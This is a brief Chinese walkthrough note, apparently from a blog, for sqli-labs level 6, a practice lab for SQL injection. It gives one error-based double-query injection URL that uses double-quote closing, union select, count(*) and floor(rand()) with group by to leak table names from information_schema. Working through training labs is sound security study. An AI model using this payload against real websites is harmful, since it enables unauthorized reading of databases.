【sqli-labs】 less6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

同less5

单引号改成双引号就行

http://localhost/sqli/Less-6/?id=a" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*9))as a from information_schema.tables group by a%23